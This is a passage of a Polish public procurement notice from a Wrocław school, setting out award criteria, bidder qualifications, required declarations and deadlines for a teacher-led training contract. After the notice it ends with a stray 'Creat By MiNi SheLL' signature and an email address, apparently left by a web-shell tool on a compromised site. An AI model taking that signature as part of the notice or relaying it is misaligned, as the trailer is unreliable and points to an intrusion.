zamówień, o których mowa w art. 214 ust. 1 pkt 7 ustawy Pzp. tj. na podobne usługi do wysokości 50% wartości zamówienia podstawowego. Zakres<br/>powyższych zamówień będzie polegał na powtórzeniu podobnych usług jak w<br/>zadaniu podstawowym i będzie obejmował usługi określone w rozdz. IV swz. Zamówienia<br/>te realizowane będą na tych samych warunkach co zamówienie podstawowe.</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1. Ocenie będą podlegać wyłącznie oferty niepodlegające odrzuceniu.<br/>2. Oferty niepodlegające odrzuceniu zostaną poddane ocenie ofert w oparciu o kryteria podane w swz i<br/>w Ogłoszeniu o zamówieniu.<br/>3. Oferty oceniane będą punktowo dla każdego kryterium oddzielnie.<br/>4. Za ofertę najkorzystniejszą zostanie uznana oferta ważna, która otrzyma najwyższą liczbę punktów<br/>wyliczoną jako sumę punktów uzyskanych w w/w kryteriach.<br/>5. Zamawiający wybiera ofertę najkorzystniejszą na podstawie kryteriów oceny ofert określonych w<br/>specyfikacji warunków zamówienia.<br/>6. Punktacja, przyznawana ofertom w poszczególnych kryteriach oceny ofert, liczona będzie z<br/>dokładnością do dwóch miejsc po przecinku.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Punktowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> organizacja, kwalifikacje zawodowe i doświadczenie osób wyznaczonych do realizacji zamówienia <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Kwalifikacje zawodowe osoby prowadzącej szkolenie (kwalifikacje pedagogiczne)</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20</span></h3> <h3 class="mb-0">Kryterium 3</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> organizacja, kwalifikacje zawodowe i doświadczenie osób wyznaczonych do realizacji zamówienia <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Doświadczenie zawodowe osoby prowadzącej szkolenie (status czynnego zawodowo nauczyciela informatyki lub nauczyciela przedmiotów zawodowych, w co najmniej jednym z zawodów, o których mowa w rozdziale IV w ust. 3 - w obu przypadkach w szkole ponadpodstawowej)</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <p class="mb-0">Art. 109 ust. 1 pkt 8</p> <p class="mb-0">Art. 109 ust. 1 pkt 10</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> 2.	O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy nie podlegają wykluczeniu na zasadach określonych w rozdz. VI swz oraz spełniają określone przez Zamawiającego warunki udziału w postępowaniu dotyczące:<br/>1)	zdolności do występowania w obrocie gospodarczym - Zamawiający nie wyznacza szczegółowego warunku w tym zakresie,<br/>2)	uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej, o ile wynika to z odrębnych przepisów - Zamawiający nie wyznacza szczegółowego warunku w tym zakresie. <br/>3)	sytuacji ekonomicznej lub finansowej - Zamawiający nie wyznacza szczegółowego warunku w tym zakresie. <br/>4)	zdolności technicznej lub zawodowej:<br/>O udzielenie zamówienia może ubiegać się Wykonawca, który dysponuje lub będzie dysponować co najmniej 4 osobami, posiadającą wykształcenie średnie lub wyższe: <br/>a)	informatyczne <br/>lub<br/>b)	elektryczne lub mechaniczne lub mechatroniczne lub chłodniczo-klimatyzacyjne lub z zakresu odnawialnych źródeł energii - wraz z ukończonymi formą/formami doskonalenia z zakresu informatyki lub obsługi drukarki 3D.<br/>UWAGA:<br/>Zamawiający, w stosunku do Wykonawców wspólnie ubiegających się o udzielenie zamówienia, <br/>w odniesieniu do warunku dotyczącego zdolności zawodowej – dopuszcza łączne spełnianie <br/>warunku przez Wykonawców.<br/>UWAGA: <br/>Zamawiający może na każdym etapie postępowania uznać, że Wykonawca nie posiada wymaganych zdolności, jeżeli posiadanie przez Wykonawcę sprzecznych interesów, w szczególności zaangażowanie zawodowych Wykonawcy w inne przedsięwzięcia gospodarcze Wykonawcy może mieć negatywny wpływ na realizację zamówienia. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">Zamawiający nie wymaga złożenia podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu.</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">1.	Zamawiający wezwie Wykonawcę, którego oferta została najwyżej oceniona, do złożenia w wyznaczonym terminie, nie krótszym niż 5 dni od dnia wezwania, następujących podmiotowych środków dowodowych:<br/>1) wykaz osób skierowanych przez wykonawcę do realizacji zamówienia publicznego w szczególności odpowiedzialnych za świadczenie usług wraz z informacjami na temat ich kwalifikacji zawodowych, uprawnień, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia publicznego, a także zakresu wykonywanych przez nie czynności oraz informacją o podstawie do dysponowania tymi osobami - wg wzoru będącego załącznikiem nr 6 do swz<br/>2.	Wykonawca, którego oferta zostanie najwyżej oceniona, zobowiązany jest do złożenia na wezwanie Zamawiającego podmiotowych środków dowodowych aktualnych na dzień ich złożenia.<br/><br/>3.	Zamawiający nie wzywa do złożenia podmiotowych środków dowodowych, jeżeli:<br/>1)	może je uzyskać za pomocą bezpłatnych i ogólnodostępnych baz danych, w szczególności rejestrów publicznych w rozumieniu ustawy z dnia 17 lutego 2005 r. o informatyzacji działalności podmiotów realizujących zadania publiczne, o ile wykonawca wskazał w oświadczeniu, o którym mowa w art. 125 ust. 1 Pzp dane umożliwiające dostęp do tych środków;<br/>2)	podmiotowym środkiem dowodowym jest oświadczenie, którego treść odpowiada zakresowi oświadczenia, o którym mowa w art. 125 ust. 1.<br/><br/>4.	Wykonawca nie jest zobowiązany do złożenia podmiotowych środków dowodowych, które Zamawiający posiada, jeżeli Wykonawca wskaże te środki oraz potwierdzi ich prawidłowość i aktualność - w takiej sytuacji Wykonawca zobowiązany jest wskazać w oświadczeniu, o którym mowa w rozdz. VIII ust. 1 swz w sposób jednoznaczny na dokumenty lub postępowanie, którego one dotyczą, a w których posiadaniu jest Zamawiający, tak by mógł on z nich skorzystać w celu potwierdzenia, że Wykonawca spełnia postawione w swz warunki udziału w postępowaniu (analogicznie należy postępować w przypadku o którym mowa w rozdz. IX swz – oświadczenie o którym mowa w rozdz. IX ust. 8 swz). <br/><br/>5.	W zakresie nieuregulowanym ustawą Pzp lub niniejszą swz do oświadczeń i dokumentów składanych przez Wykonawcę w postępowaniu zastosowanie mają w szczególności przepisy rozporządzenia Ministra Rozwoju Pracy i Technologii z dnia 23 grudnia 2020 r. w sprawie podmiotowych środków dowodowych oraz innych dokumentów lub oświadczeń, jakich może żądać Zamawiający od Wykonawcy oraz rozporządzenia Prezesa Rady Ministrów z dnia 30 grudnia 2020 r. w sprawie sposobu sporządzania i przekazywania informacji oraz wymagań technicznych dla dokumentów elektronicznych oraz środków komunikacji elektronicznej w postępowaniu o udzielenie zamówienia publicznego lub konkursie.</span> </h3> <h3 class="mb-0">5.8.) Wykaz przedmiotowych środków dowodowych: </h3> Zamawiający nie wymaga złożenia przedmiotowych środków dowodowych <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> 1.	Treść oferty stanowi wypełniony: „Formularz ofertowy” stanowiący załącznik nr 1 do swz <br/><br/>2.	Wraz z ofertą muszą zostać złożone:<br/>1)	oświadczenie Wykonawcy o niepodleganiu wykluczeniu z postępowania, o którym mowa w rozdz. VIII ust. I swz - wzór oświadczenia stanowi Załącznik nr 2 do swz <br/>UWAGA: w przypadku wspólnego ubiegania się o zamówienie przez Wykonawców, oświadczenie o niepoleganiu wykluczeniu składa każdy z Wykonawców;<br/>2)	oświadczenie wykonawców wspólnie ubiegających się o udzielenie zamówienia, o którym mowa w rozdz. XII ust. 6 swz - wzór oświadczenia stanowi załącznik nr 4 do swz (jeżeli dotyczy); <br/>3)	zobowiązanie innego podmiotu, o którym mowa w rozdz. IX ust. 5 swz - wzór zobowiązania stanowi załącznik nr 5 do swz (jeżeli dotyczy);<br/>4)	oświadczenie innego podmiotu o niepodleganiu wykluczeniu z postępowania, o którym mowa w rozdz. IX ust. 8 swz - wzór oświadczenia stanowi załącznik nr 3 do swz (jeżeli dotyczy); <br/>5)	pełnomocnictwo* upoważniające do złożenia oferty - o ile ofertę składa pełnomocnik; <br/>6)	pełnomocnictwo* dla pełnomocnika do reprezentowania w postępowaniu Wykonawców wspólnie ubiegających się o udzielenie zamówienia - dotyczy ofert składanych przez Wykonawców wspólnie ubiegających się o udzielenie zamówienia; <br/>*UWAGA:<br/>Pełnomocnictwo do złożenia oferty i pełnomocnictwo dla pełnomocnika do reprezentowania Wykonawców wspólnie ubiegających się o udzielenie zamówienia musi być złożone w oryginale w takiej samej formie, jak składana oferta (t.j. w formie elektronicznej opatrzonej kwalifikowanym podpisem elektronicznym lub postaci elektronicznej opatrzonej podpisem zaufanym lub podpisem osobistym). Dopuszcza się także złożenie elektronicznej kopii (skanu) pełnomocnictwa sporządzonego uprzednio w formie pisemnej, w formie elektronicznego poświadczenia sporządzonego stosownie do art. 97 § 2 ustawy z dnia 14 lutego 1991 r. - Prawo o notariacie, które to poświadczenie notariusz opatruje kwalifikowanym podpisem elektronicznym, bądź też poprzez opatrzenie skanu pełnomocnictwa sporządzonego uprzednio w formie pisemnej kwalifikowanym podpisem, podpisem zaufanym lub podpisem osobistym mocodawcy. Elektroniczna kopia pełnomocnictwa nie może być uwierzytelniona przez upełnomocnionego. <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 1.	Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia. W takim przypadku Wykonawcy ustanawiają pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia albo reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego. Pełnomocnictwo winno być załączone do oferty w formie opisane w rozdz. XIII ust. 12 swz.<br/><br/>2.	Wszelka korespondencja będzie prowadzona przez Zamawiającego wyłącznie z pełnomocnikiem.<br/><br/>3.	W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia, żaden z nich nie może podlegać wykluczeniu z postępowania na podstawie przesłanek, o których mowa w rozdz. VI swz.<br/><br/>4.	W przypadku wspólnego ubiegania się o zamówienie przez Wykonawców, oświadczenie o którym mowa w rodz. VIII ust. I swz składa i podpisuje każdy z Wykonawców wspólnie ubiegających się o zamówienie (odrębnie) Oświadczenie to potwierdza brak podstaw wykluczenia oraz spełnianie warunków udziału w zakresie, w jakim każdy z Wykonawców wykazuje spełnianie warunków udziału w postępowaniu.<br/><br/>5. W odniesieniu do warunków dotyczących wykształcenia, kwalifikacji zawodowych <br/>lub doświadczenia, Wykonawcy wspólnie ubiegający się o udzielenie zamówienia mogą polegać <br/>na zdolnościach tych z Wykonawców, którzy wykonają usługi, do realizacji których te zdolności są <br/>wymagane. <br/>6. W przypadku, o którym mowa w ust. 5, Wykonawcy wspólnie ubiegający się o udzielenie <br/>zamówienia dołączają do oferty oświadczenie, z którego wynika, które usługi wykonają poszczególni Wykonawcy – załącznik nr 4 do swz. <br/>7. Oświadczenia i dokumenty potwierdzające brak podstaw do wykluczenia z postępowania składa <br/>każdy z Wykonawców wspólnie ubiegających się o zamówienie.<br/>8. W przypadku wyboru oferty Wykonawców wspólnie ubiegających się o udzielenie zamówienia:<br/>1)	Zamawiający żąda umowy regulującej współpracę tych Wykonawców przed podpisaniem umowy w sprawie zamówienia publicznego,<br/>2)	Wykonawcy ponoszą solidarną odpowiedzialność za wykonanie umowy. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Tak</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Zamawiający dopuszcza możliwość dokonania zmian treści umowy zgodnie z postanowieniami projektu umowy, stanowiącego załącznik 7 do swz. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2022-02-07 09:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">miniPortal - Wykonawca składa ofertę za pośrednictwem „Formularza do złożenia lub wycofania oferty” dostępnego na ePUAP i udostępnionego również na miniPortalu. Sposób złożenia oferty został opisany w rozdz. IX i XIII, XIV swz oraz w Instrukcji użytkownika dostępnej na miniportalu.</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2022-02-07 10:00</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2022-03-08</span></h3> <h3 class="mb-0">8.5.) Zamawiający przewiduje wybór najkorzystniejszej oferty z możliwością negocjacji: <span class="normal">Tak</span></h3> <h3 class="mb-0">8.6.) Maksymalna liczba wykonawców, którzy zostaną zaproszeni do negocjacji: <span class="normal">5</span></h3> <h3 class="mb-0">8.7) Kryteria oceny ofert, które zamawiający zamierza stosować w celu ograniczenia liczby wykonawców: </h3> Zamawiający, w celu ograniczenia liczby wykonawców zapraszanych do negocjacji ofert, zastosuje kryterium oceny ofert: cena brutto. <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> KRYTERIA JAKOŚCIOWE:<br/>Kryterium – KWALIFIKACJE ZAWODOWE osoby wyznaczonej do realizacji zamówienia (kwalifikacje pedagogiczne)<br/>Zamawiający dokona oceny tego kryterium na podstawie złożonego przez Wykonawcę oświadczenia w Formularzu ofertowym, w którym Wykonawca wskaże czy osoby wyznaczone do realizacji zamówienia posiadają, na dzień złożenia oferty, kwalifikacje pedagogiczne.<br/>Za każdego prowadzącego szkolenie, który posiada na dzień składania oferty kwalifikacje pedagogiczne, Wykonawca może uzyskać 5 punktów. <br/>Maksymalna ilość punktów – 20. <br/>Zamawiający będzie przyznawał punkty wyłącznie do wysokości 20 pkt – każda kolejna osoba spełniające wskazane kryterium nie będzie punktowana. <br/>WAŻNE INFORMACJE: <br/>Wykonawca, którego oferta zostanie najwyżej oceniona, zostanie wezwany do złożenia, w wyznaczonym terminie (rozdz. VIII ust. I pkt 2 swz), wykazu osób, potwierdzającego spełnianie warunku zdolności zawodowej, o którym mowa w rozdz. VII ust. 2 pkt 4 swz.<br/>Jednocześnie Wykonawca oświadczy w Formularzu ofertowym, iż osoby, których kwalifikacje zawodowe wykaże (tj. uzyskując tym samym punkty w niniejszym kryterium), będą faktycznie realizowały przedmiot zamówienia, i zostaną wykazane w wykazie osób, o którym mowa w rozdz. VIII ust. I pkt 2 swz. <br/><br/>Kryterium – DOŚWIADCZENIE ZAWODOWE osoby wyznaczonej do realizacji zamówienia (status czynnego zawodowo nauczyciela informatyki lub nauczyciela przedmiotów zawodowych, w co najmniej jednym z zawodów, o których mowa w rozdziale IV w ust. 3 swz - w obu przypadkach w szkole ponadpodstawowej)<br/><br/>Zamawiający dokona oceny tego kryterium na podstawie złożonego przez Wykonawcę oświadczenia w Formularzu ofertowym, w którym Wykonawca wskaże czy osoby wyznaczone do realizacji zamówienia posiadają status czynnego zawodowo nauczyciela informatyki lub nauczyciela przedmiotów zawodowych, w co najmniej jednym z zawodów, o których mowa w rozdziale IV w ust. 3 swz - w obu przypadkach w szkole ponadpodstawowej).<br/>Ocenie będzie podlegać czy osoby te posiadają status czynnego zawodowo nauczyciela informatyki lub nauczyciela przedmiotów zawodowych, w co najmniej jednym z zawodów, o których mowa w rozdziale IV w ust. Za każdego prowadzącego szkolenie, który posiada, na dzień składania oferty, status czynnego zawodowo nauczyciela informatyki lub nauczyciela przedmiotów zawodowych, w co najmniej jednym z zawodów, o których mowa w rozdziale IV w ust. 3 swz - w obu przypadkach w szkole ponadpodstawowej, Wykonawca może uzyskać 5 punktów.<br/>Maksymalna ilość punktów – 20.<br/>UWAGA:<br/>Zamawiający będzie przyznawał punkty wyłącznie do wysokości 20 pkt – każda kolejna osoba spełniające wskazane kryterium nie będzie punktowana. <br/><br/>WAŻNE INFORMACJE: <br/>Wykonawca, którego oferta zostanie najwyżej oceniona, zostanie wezwany do złożenia, w wyznaczonym terminie (rozdz. VIII ust. I pkt 2 swz), wykazu osób, potwierdzającego spełnianie warunku zdolności zawodowej, o którym mowa w rozdz. VII ust. 2 pkt 4 swz.<br/>Jednocześnie Wykonawca oświadczy w Formularzu ofertowym, iż osoby, których doświadczenie zawodowe wykaże (uzyskując tym samym punkty w niniejszym kryterium), będą faktycznie realizowały przedmiot zamówienia, i zostaną wykazane w wykazie osób, o którym mowa w rozdz. VIII ust. I pkt 2 swz. <br/><br/>Zamawiającym jest Gm. WROCŁAW w imieniu której działa P. Piotr Lusar - Dyrektor Zespołu Szkół Nr 18 we Wrocławiu (pełnomocnictwo nr 20/I/JO/21 z dnia 01.02.2021r. – w ramach projektu „Zawodowa 18”), zwany „Zamawiającym”.<br/><br/>UWAGA:Zamawiający informuje, że termin realizacji wskazany w niniejszym Ogłoszeniu, został podany w dniach z uwagi na ograniczenia techniczne Platformy - tj. brak możliwości wyboru opcji wskazania terminu w tygodniach (70 tygodni = 490 dni).

Creat By MiNi SheLL
Email: jattceo@gmail.com